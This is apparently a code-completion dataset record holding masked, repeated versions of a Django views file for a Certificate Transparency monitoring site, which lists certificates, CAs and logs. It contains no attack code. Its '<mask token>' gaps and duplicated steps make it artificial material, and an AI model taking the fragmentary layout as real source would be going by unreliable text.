paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef list_cn_certs(request, cn):\n field_id = 'common name'\n expression = cn\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [cn])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 
'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef flag(request, flag_id):\n try:\n with open(os.path.join(BASE_DIR, 'static/flags/png/{0}.png'.format(\n flag_id.lower())), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n except IOError:\n with open(os.path.join(BASE_DIR, 'static/flags/png/-.png'), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n\n\n<mask token>\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n status['analyzer']['lastrun'] = 
datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. 
sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n 
date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = 
FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = 
paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef list_cn_certs(request, cn):\n field_id = 'common name'\n expression = cn\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [cn])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 
'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef flag(request, flag_id):\n try:\n with open(os.path.join(BASE_DIR, 'static/flags/png/{0}.png'.format(\n flag_id.lower())), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n except IOError:\n with open(os.path.join(BASE_DIR, 'static/flags/png/-.png'), 'rb') as f:\n return HttpResponse(f.read(), content_type='image/png')\n\n\ndef imprint(request):\n return render(request, 'observer/imprint.html')\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n 
status = json.load(f)\n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-5": "from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom django.db.models import Count\nfrom django.db.models import QuerySet\nfrom django.db import connection\nfrom django.core.paginator import Paginator, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.http import HttpResponsePermanentRedirect\nimport datetime\nimport os\nimport json\nfrom ctobservatory.settings import BASE_DIR\nfrom .models import *\nfrom notification.forms import SubscribeUnsubscribeForm\n#from .issuefinder import *\nimport observer.issuefinder as issuefinder\nfrom django.template.defaulttags import register\nimport hashlib\nimport psycopg2\nITEMS_PER_PAGE = 50\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\nclass FastCountQuerySet():\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute(\"SELECT reltuples FROM pg_class WHERE relname = %s\", [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n # passthrough all the other methods\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n \n def __getitem__(self, item):\n return self.queryset[item]\n\nclass MetadataCountQuerySet():\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute(\"SELECT name_value FROM metadata WHERE name_type = %s\", [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n # passthrough all the other methods\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n \n def __getitem__(self, key):\n return self.queryset[key]\n 
\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n \n messages = []\n if('subok' in request.GET):\n messages.append({'class':'alert-info','text':'<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'})\n if('unsubok' in request.GET):\n messages.append({'class':'alert-info','text':'<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'})\n \n subscribeform = SubscribeUnsubscribeForm()\n \n with connection.cursor() as c:\n c.execute(\"SELECT NAME_TYPE, NAME_VALUE FROM metadata\")\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n\n return render(request, 'observer/index.html',\n {\n 'total_certs': metadata['number_of_certs'],\n 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(),\n 'active_certs': metadata['number_of_active_certs'],\n 'expired_certs': metadata['number_of_expired_certs'],\n 'revoked_certs': metadata['number_of_revoked_certs'],\n 'misissued_certs': metadata['number_of_misissued_certs'],\n 'behaving_cas' : metadata['number_of_correctly_behaving_cas'],\n 'interesting_cas' : metadata['number_of_interesting_cas'],\n 'biggest_log' : metadata['number_of_certs_in_biggest_log'],\n 'biggest_log_name' : CtLog.objects.get(id=metadata['biggest_log_id']).name,\n 'smallest_log' : metadata['number_of_certs_in_smallest_log'],\n 'uptime_days': (timezone.now().date()-datetime.date(2015,10,14)).days, #TODO\n 'messages' : messages,\n 'subscribeform' : subscribeform\n }\n )\n\ndef search(request):\n term = request.GET.get(\"term\",\"\")\n\n #found_ca = Ca.objects.filter(name__icontains=term)\n #found_cn_dnsname = Certificate.objects.raw(\"SELECT DISTINCT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, x509_notBefore(CERTIFICATE) FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE (NAME_TYPE='dNSName' AND 
reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s))) OR (NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s)))\n #ORDER BY x509_notBefore(CERTIFICATE) DESC\", [term, term])\n\n return render(request, 'observer/search.html',\n {\n 'term' : term\n #'found_ca' : found_ca,\n #'found_cn_dnsname' : found_cn_dnsname\n }\n )\n\ndef caall(request, page=None): #VIEW FOR CAs\n \n if(page==None):\n return HttpResponsePermanentRedirect(\"all/1\")\n \n\n page = int(page)\n\n list_of_certs = []\n \n filtered_qs = CaFilter(\n request.GET, \n queryset=Ca.objects.all().order_by('common_name')\n )\n\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n \n return render(request, 'observer/cas.html',\n {\n 'list_of_ca': list_of_certs, \n 'filter': filtered_qs#Ca.objects.annotate(num_certs=Count('certificate')).order_by('-num_certs'),\n }\n )\n\ndef certall(request, page=None, ae=None, issuer_ca=None): #VIEW FOR Certificates->ALL\n\n if(page==None):\n return HttpResponsePermanentRedirect(\"all/1\")\n\n ae = request.GET.get(\"algorithm\")\n issuer_ca = request.GET.get(\"issuer_ca\")\n date_notbefore = request.GET.get(\"date_notbefore\")\n date_notbefore_gte = request.GET.get(\"date_notbefore_gte\")\n is_active = request.GET.get(\"is_active\")\n date_notafter = request.GET.get(\"date_notafter\")\n date_notafter_lte = request.GET.get(\"date_notafter_lte\")\n \n page = int(page)\n\n list_of_certs = []\n\n \n\n filtered_qs = CertFilter(\n request.GET, \n queryset=MetadataCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')\n )\n \n\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n\n\n \n #Alternative filter solution for better performance\n 
#https://localhost/cert/all/1?issuer_ca=merge&date_notbefore=&date_notbefore_gte=&is_active=&date_notafter=&date_notafter_lte=\n \n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active == \"1\" or is_active == \"\" or is_active == None):\n if(issuer_ca != None and (is_active == None or is_active == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and (issuer_ca == None or issuer_ca == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'certificate')\n \n if(issuer_ca == \"\" and is_active == \"\"):\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and issuer_ca != None ): \n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains = issuer_ca,\n not_before__lte=timezone.now(), not_after__gte=timezone.now(), ), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active == \"0\" or is_active == \"\" or is_active == None):\n if(issuer_ca != None and (is_active == None or is_active == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and (issuer_ca == None or issuer_ca == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(not_after__lte=datetime.date.today()), 'certificate')\n \n if(issuer_ca == \"\" and is_active == \"\"):\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and issuer_ca != None ): \n query = FastCountQuerySet(Certificate.objects.filter(\n 
issuer_ca__common_name__contains = issuer_ca,\n not_after__lte=datetime.date.today() ), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n \n ####################################################\n \n\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n \n #if(ae != None):\n #list_of_certs = Certificate.objects.raw(\"SELECT * FROM certificate WHERE SIGNATURE_ALGORITHM=%s\", [ae])\n \n \n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs, \n 'filter': filtered_qs\n }\n )\n\ndef certactive(request, page=None):\n\n if(page==None):\n return HttpResponsePermanentRedirect(\"active/1\")\n\n page = int(page)\n\n list_of_certs = []\n\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'number_of_active_certs'), ITEMS_PER_PAGE)\n if(page in paginator.page_range):\n list_of_certs = paginator.page(page)\n\n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs\n }\n )\n\ndef certexpired(request, page=None, order=None):\n if(page==None):\n return HttpResponsePermanentRedirect(\"expired/1\")\n\n\n page = int(page)\n\n list_of_certs = []\n\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_after__lt=timezone.now()), 'number_of_expired_certs'), ITEMS_PER_PAGE)\n# paginator = Paginator(Certificate.objects.filter(not_after__lt=timezone.now()), ITEMS_PER_PAGE)\n if(page in paginator.page_range):\n list_of_certs = paginator.page(page)\n\n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs\n }\n )\ndef certrevoked(request, page=None):\n if(page==None):\n return HttpResponsePermanentRedirect(\"revoked/1\")\n\n page = int(page)\n\n list_of_certs = []\n\n paginator = Paginator(Certificate.objects.filter(id__in=RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE)\n if(page in 
paginator.page_range):\n list_of_certs = paginator.page(page)\n\n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs\n }\n )\n\ndef certs_by_log(request, log_id, page=None):\n if(page==None):\n return HttpResponsePermanentRedirect(\"./1\")\n\n page = int(page)\n log_id = int(log_id)\n \n list_of_certs = []\n \n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id), ITEMS_PER_PAGE)\n if(page in paginator.page_range):\n list_of_entries = paginator.page(page)\n \n\n return render(request, 'observer/log_certs.html',\n {\n 'log': get_object_or_404(CtLog, pk=log_id),\n 'list_of_entries' : list_of_entries\n }\n )\n\ndef certs_by_ca(request, ca_id, page=None):\n\n if(page==None):\n return HttpResponsePermanentRedirect(\"certificates/1\")\n\n page = int(page)\n ca_id = int(ca_id)\n\n list_of_certs = []\n \n \n \n filtered_qs = CertFilter(\n request.GET, \n queryset=Certificate.objects.filter(issuer_ca=ca_id)\n )\n\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n \n \n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs, \n 'filter': filtered_qs\n })\n \n \n\n# paginator = Paginator(Certificate.objects.filter(issuer_ca=ca_id), ITEMS_PER_PAGE)\n# if(page in paginator.page_range):\n# list_of_certs = paginator.page(page)\n\n# return render(request, 'observer/certs.html',\n# {\n# 'list_of_certs': list_of_certs\n# }\n# )\n\ndef list_cn_certs(request, cn):\n\n field_id = 'common name'\n expression = cn\n\n list_of_certs = Certificate.objects.raw(\"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\", [cn])\n #list_of_certs = 
Certificate.objects.filter(certificate__common_name=cn).order_by('not_before')\n \n \n issues = issuefinder.get_all_issues(list(list_of_certs))\n #issues = issuefinder.get_first_certificates(list_of_certs)\n\n return render(request, 'observer/history.html',\n {\n 'field_id': field_id,\n 'expression': expression,\n 'list_of_certs': list_of_certs,\n 'issues':issues\n }\n )\n\ndef list_dnsname_certs(request, dnsname):\n\n field_id = 'dnsname'\n expression = dnsname\n\n list_of_certs = Certificate.objects.raw(\"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\", [dnsname])\n \n issues = issuefinder.get_all_issues(list(list_of_certs))\n \n return render(request, 'observer/history.html',\n {\n 'field_id': field_id,\n 'expression': expression,\n 'list_of_certs': list_of_certs,\n 'issues':issues\n }\n )\n\ndef log(request): #LOG VIEW\n return render(request, 'observer/logs.html',\n {\n #'list_of_logs': CtLog.objects.all().annotate(entries=Count('ctlogentry')).order_by('latest_entry_id')\n 'list_of_logs': CtLog.objects.all().order_by('-is_active','-latest_entry_id','name')\n }\n )\n\ndef cadetail(request,ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n \n #counting number of issued CA's:\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n \n return render(request, 'observer/cadetail.html', { 'ca' : ca, 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request,cert_id=None,cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex') #Does not work on python3\n cert = get_object_or_404(Certificate, certificate__sha256=cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = 
